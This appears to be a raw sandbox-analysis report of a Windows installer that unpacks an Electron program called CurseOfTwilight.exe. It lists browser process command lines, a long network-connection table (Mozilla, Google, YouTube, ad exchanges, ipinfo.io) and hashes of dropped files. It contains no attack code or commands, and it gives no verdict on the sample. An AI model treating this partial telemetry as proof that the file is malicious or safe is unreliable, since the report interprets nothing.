"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.10.1193580604\1171908264" -childID 9 -isForBrowser -prefsHandle 5660 -prefMapHandle 3792 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e314fb9f-d861-4465-b30e-99e3b911ac6d} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5840 1fd33792258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.11.2098448261\2017570811" -childID 10 -isForBrowser -prefsHandle 4468 -prefMapHandle 4460 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b848850-3f2a-4ae2-b961-34a94f183a52} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4444 1fd341a3c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.12.1675892939\1350011074" -childID 11 -isForBrowser -prefsHandle 10468 -prefMapHandle 10464 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b62d922e-a2ec-4cec-a436-1285fd0c60c1} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10420 1fd3476ff58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.13.1754570692\1971234624" -parentBuildID 20221007134813 -prefsHandle 5084 -prefMapHandle 5080 -prefsLen 26768 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bcf6d9b-213a-4abc-9bc4-24a7c10c2dbb} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5072 1fd3337bb58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.14.776247035\567234108" -childID 12 -isForBrowser -prefsHandle 10544 -prefMapHandle 10592 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fe4a9cb-a09d-41b9-8a6e-7bac13483456} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10496 1fd30fdac58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.15.536849232\1366200867" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 10712 -prefMapHandle 10716 -prefsLen 26768 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {56cbbcb0-3440-4357-bd42-88d018e75155} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10704 1fd353d2b58 utility
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 44.237.149.213:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 213.149.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.178.14:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.178.14:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| GB | 216.58.213.14:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wildtangent.com | udp |
| US | 104.22.9.18:443 | www.wildtangent.com | tcp |
| US | 8.8.8.8:53 | www.wildtangent.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | www.wildtangent.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 18.9.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com | udp |
| AU | 192.200.160.253:443 | cdn11.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| AU | 192.200.160.253:443 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn.weglot.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.weglot.com.cdn.cloudflare.net | udp |
| US | 104.18.6.32:443 | cdn.weglot.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | cdn.weglot.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com | udp |
| US | 8.8.8.8:53 | microapps.bigcommerce.com | udp |
| US | 8.8.8.8:53 | cdn.pbxai.com | udp |
| US | 8.8.8.8:53 | d2ipqnz901lbdy.cloudfront.net | udp |
| US | 8.8.8.8:53 | microapp-cdn.gcp.bigcommerce.net | udp |
| GB | 18.165.227.52:443 | d2ipqnz901lbdy.cloudfront.net | tcp |
| US | 34.117.232.248:443 | microapp-cdn.gcp.bigcommerce.net | tcp |
| US | 8.8.8.8:53 | d2ipqnz901lbdy.cloudfront.net | udp |
| US | 8.8.8.8:53 | microapp-cdn.gcp.bigcommerce.net | udp |
| US | 8.8.8.8:53 | 253.160.200.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.131.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.6.18.104.in-addr.arpa | udp |
| AU | 63.141.128.3:443 | checkout-sdk.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| AU | 63.141.128.3:443 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 34.117.232.248:443 | microapp-cdn.gcp.bigcommerce.net | udp |
| US | 104.18.6.32:443 | cdn.weglot.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.232.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.128.141.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.155.64.172.in-addr.arpa | udp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | tcp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | 117.131.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 52.13.108.59:443 | api.wildtangent.com | tcp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 52.13.108.59:443 | api.wildtangent.com | tcp |
| US | 8.8.8.8:53 | 59.108.13.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| GB | 13.224.222.55:443 | pool-vervegroup.adhese.com | tcp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| GB | 172.217.169.34:443 | securepubads46.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 55.222.224.13.in-addr.arpa | udp |
| GB | 172.217.169.34:443 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| IE | 63.33.210.103:443 | prebid.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 107.151.11.18:443 | ghb.adtelligent.com | tcp |
| US | 8.8.8.8:53 | ghb-adtelligent-com.geodns.me | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | ghb-adtelligent-com.geodns.me | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.210.33.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 54.84.92.154:443 | report2.hb.brainlyads.com | tcp |
| US | 8.8.8.8:53 | pbs.nextmillmedia.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 54.146.225.145:443 | pbs.nextmillmedia.com | tcp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| IE | 108.129.27.194:443 | hb.yellowblue.io | tcp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | web.hb.ad.cpe.dotomi.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| US | 54.146.225.145:443 | pbs.nextmillmedia.com | tcp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | 18.11.151.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| NL | 185.89.210.244:443 | ib.anycast.adnxs.com | tcp |
| DE | 52.29.40.124:443 | hb.adscale.de | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| NL | 89.207.16.146:443 | web.hb.ad.cpe.dotomi.com | tcp |
| DE | 195.201.193.117:443 | shb.richaudience.com | tcp |
| IE | 52.30.102.7:443 | ap.lijit.com | tcp |
| NL | 185.89.210.244:443 | ib.anycast.adnxs.com | tcp |
| DE | 18.192.164.245:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | 154.92.84.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.27.129.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.225.146.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | nmm-use1-prod-alb-pbs-server-1662300823.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.40.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.193.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 8.8.8.8:53 | nmm-use1-prod-alb-pbs-server-1662300823.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | cookies.nextmillmedia.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 35.153.242.231:443 | cookies.nextmillmedia.com | tcp |
| US | 8.8.8.8:53 | nmm-use1-prod-alb-pbs-cookiesync-1017292304.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | nmm-use1-prod-alb-pbs-cookiesync-1017292304.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| DE | 162.55.236.225:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 8.8.8.8:53 | 231.242.153.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.236.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 172.217.16.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 172.217.16.246:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 246.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-4g5e6ns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4.sn-4g5e6ns6.googlevideo.com | udp |
| DE | 173.194.187.9:443 | rr4.sn-4g5e6ns6.googlevideo.com | tcp |
| DE | 173.194.187.9:443 | rr4.sn-4g5e6ns6.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr4.sn-4g5e6ns6.googlevideo.com | udp |
| DE | 173.194.187.9:443 | rr4.sn-4g5e6ns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.187.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacyportal-de.onetrust.com | udp |
| US | 104.18.32.137:443 | privacyportal-de.onetrust.com | tcp |
| US | 8.8.8.8:53 | privacyportal-de.onetrust.com | udp |
| US | 8.8.8.8:53 | privacyportal-de.onetrust.com | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-4g5lznl6.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3.sn-4g5lznl6.googlevideo.com | udp |
| DE | 74.125.173.40:443 | rr3.sn-4g5lznl6.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr3.sn-4g5lznl6.googlevideo.com | udp |
| DE | 74.125.173.40:443 | rr3.sn-4g5lznl6.googlevideo.com | tcp |
| DE | 74.125.173.40:443 | rr3.sn-4g5lznl6.googlevideo.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 74.125.193.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 40.173.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 74.125.193.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.193.125.74.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | rr3---sn-q4fzenee.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3.sn-q4fzenee.googlevideo.com | udp |
| US | 173.194.141.200:443 | rr3.sn-q4fzenee.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr3.sn-q4fzenee.googlevideo.com | udp |
| US | 173.194.141.200:443 | rr3.sn-q4fzenee.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr3---sn-q4fzenee.googlevideo.com | udp |
| US | 173.194.141.200:443 | rr3---sn-q4fzenee.googlevideo.com | tcp |
| US | 173.194.141.200:443 | rr3---sn-q4fzenee.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 200.141.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 142.250.187.238:443 | suggestqueries-clients6.youtube.com | tcp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| US | 173.194.141.200:443 | rr3---sn-q4fzenee.googlevideo.com | tcp |
| US | 173.194.141.200:443 | rr3---sn-q4fzenee.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | suggestqueries-clients6.youtube.com | udp |
Files
\Users\Admin\AppData\Local\Temp\nsq617.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
\Users\Admin\AppData\Local\Temp\nsq617.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\chrome_100_percent.pak
| MD5 | e4cbb48c438622a4298c7bdd75cc04f6 |
| SHA1 | 6f756d31ef95fd745ba0e9c22aadb506f3a78471 |
| SHA256 | 24d92bbeb63d06b01010fe230c1e3a31e667a159be7e570a8efe68f83ed9ad40 |
| SHA512 | 8d3ea1b5ca74c20a336eaa29630fd76ecd32f5a56bb66e8cef2bce0fa19024ea917562fd31365081f7027dde9c8464742b833d08c8f41fdddc5bd1a74b9bc766 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\chrome_200_percent.pak
| MD5 | 99b95d59d6817b46e9572e3354c97317 |
| SHA1 | 6809db4ca8e10edd316261a3490d5fc657372c12 |
| SHA256 | 55d873a9f3ac69bbf6eb6940443df8331ebd7aa57138681d615f3b89902447e7 |
| SHA512 | 3071cfeb74d5058c4b7c01bfe3c6717d9bb426f3354c4d8a35bd3e16e15cde2f2c48238cb6382b0703b1cc257d87fcecfb84fbf4f597f58e64463ceede4366dd |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\d3dcompiler_47.dll
| MD5 | 5b41c100af17dbd5b679a67c939c3bce |
| SHA1 | e635dbe681484325d1305e70b0f0b20bbf5bc415 |
| SHA256 | df91767ee6031a065dc931fb145d1dc53354c51917c311d7f36f5618c2c60a14 |
| SHA512 | fcedb815f3bd9f3cde549daa963ef40371d4e8748195df07d0a81643aea5890dfa7e918047cb0036e790df2bb236d4b75a8d64440bf8372e3a3a61b64807f33e |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\ffmpeg.dll
| MD5 | 384713176a162115d30e9af7ee20a5c6 |
| SHA1 | 7efd2c9adb08fd4b893cad5613891f2e96e88351 |
| SHA256 | 64dbe39b8bced2d4f2ddd727e914f17a385366cac4d4e63118915b2b093d90c9 |
| SHA512 | 2d25176ae9f9d35f82c713e2321e74fbe4e730437a0ae733adc49d85f41c6c47287617f497ea0b414716bd790079d1b4372bd07f51664222276879fcec15af5a |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\CurseOfTwilight.exe
| MD5 | 14d67caae57de64b30ec1acf8d5f1dd5 |
| SHA1 | 9814c6378b6082fe4f01d497efb1d7a57f9035f6 |
| SHA256 | 3baaa6d00d37aaac04442c71c9dbc5d6b396d615e9ab3b4f766fccbaeb15c877 |
| SHA512 | 5a41106646ff8bec04b537fb792411a3327a339e4d7bb5f3e9831c282945998eab46417ad8f69ba48b21401545c0d3b51d3bdffb7b211cc9475b0bb3c1958551 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\icudtl.dat
| MD5 | a53cdb912b8e75c7436d05520fcebd37 |
| SHA1 | 55a7fcf21291da445c2ccbf996458b6ce7f3e2fd |
| SHA256 | 815c3c2abd62993f9991260cfd54a2c526b571a69d0468f5a6b15c3d10c64468 |
| SHA512 | 50021eb8f320b5a5884394341e1fd7b36b791189600a935f477dc702646de49137798170637109ce54604b520772c8acdde5c9c45d70df06550ec98fcf8cd355 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\libEGL.dll
| MD5 | 6c5b0b0db75e8c47ab56becc18711074 |
| SHA1 | 496fbf7623a6c81b5c7ffa9b24b73281261653ee |
| SHA256 | f37e1330f5213a7171d8d227300b431dee8ba4f5809c86dd88240ce440724d0a |
| SHA512 | cd5689cd1f72ef0e7f92515217290179885ae9a47186351347cb93354c028eba1c543920cf51c0f83ae16543c1dffd7f7cfae05d6883c1bf40924af08fed89ed |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\libGLESv2.dll
| MD5 | 501c6fe94d825c3bc81fe70d665cea54 |
| SHA1 | fe770e9dcd0b9b19967af2d8c88549e35b5cd2b7 |
| SHA256 | fad44515201923a22ec4b8a6323c4a348ea103c9db7a2a39c1dd4800286ffd17 |
| SHA512 | 9fcc29b55441663b2cf95eed1a19bda35b0740f61164d17c560c31fb3c859c367cff16d418a6a569bb4f510d90a25e2c07e32d057ec3901bb496619231dfd4da |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\LICENSE.electron.txt
| MD5 | 4d42118d35941e0f664dddbd83f633c5 |
| SHA1 | 2b21ec5f20fe961d15f2b58efb1368e66d202e5c |
| SHA256 | 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d |
| SHA512 | 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\v8_context_snapshot.bin
| MD5 | 264e3b574e4f86b1fc47b2427402e779 |
| SHA1 | 4a4f9e7c3da262713e4cf7af6ac51822c56b5ef3 |
| SHA256 | ed559c6e81b6003b2057e5c1b0bdb5b28ca094b895ca86c69fe11c5c9e014f06 |
| SHA512 | 144365d0fb83576aaa02ea6ecea51d7ba2cacb044eea568a08f65b98a83d3e7d7e693738e065e22f94bfd1165d0ea93a749dd1325d829257a9bb6607a9a927db |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\snapshot_blob.bin
| MD5 | 40a3c2200e4126e8c47a7802532c9236 |
| SHA1 | 212a4686dea5a467b7b6fa54397e42122b235f1e |
| SHA256 | 94aa518fc892ee9a0f1eb5fe35b60123ee61a5f848864b00519b96d8d5d9786d |
| SHA512 | fa1a943822abe3737587d520654078117cae86c58fefe6dd6a09f4a08c09293e9547a0ad79c52f8638dfbb1c496df3d0e828ce414176c8fbb77113be41212866 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\resources.pak
| MD5 | 6e1fad905fa7f5f18dd5ce2fb95fb502 |
| SHA1 | 215869f0ec522461305573d9656129c53c2373fd |
| SHA256 | 6f7b84f43e96c3e4681d998eb46e5adb5e04005d46d480400dc9314d4a253c43 |
| SHA512 | 3cce71cdb801f06ae885fe65736f4c9424f4d5d527ca80d5149100f1815df0ea52bcae9e7ce06e5dd6cf67a5214b264ab806fbe770798ccefb2984ed2cba4235 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\LICENSES.chromium.html
| MD5 | 3400d7ccd413de55a25a4bee0345d4bd |
| SHA1 | b57188af52bd399d07b18eb0abe6105dd8688300 |
| SHA256 | d53f979fa08635548e38b4f036391069cde0f051ee487c50a8057d199322df09 |
| SHA512 | b014cfe3238541a9fe8cb9775651b45d29e9e646a9836e29e58934817c69240af66d608dd4711894da0621c84d74f592620236502b7f2c2643ecec7ea906720a |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\vk_swiftshader.dll
| MD5 | 413700033c7a02a0fb21eb0b57e3d87e |
| SHA1 | 77961132c3450418f6f8601e9210420602039cf0 |
| SHA256 | 2a711ae49eea54fd2d7e213af228ffaf57f5a76d8c8d9c225f4b055198f47bc8 |
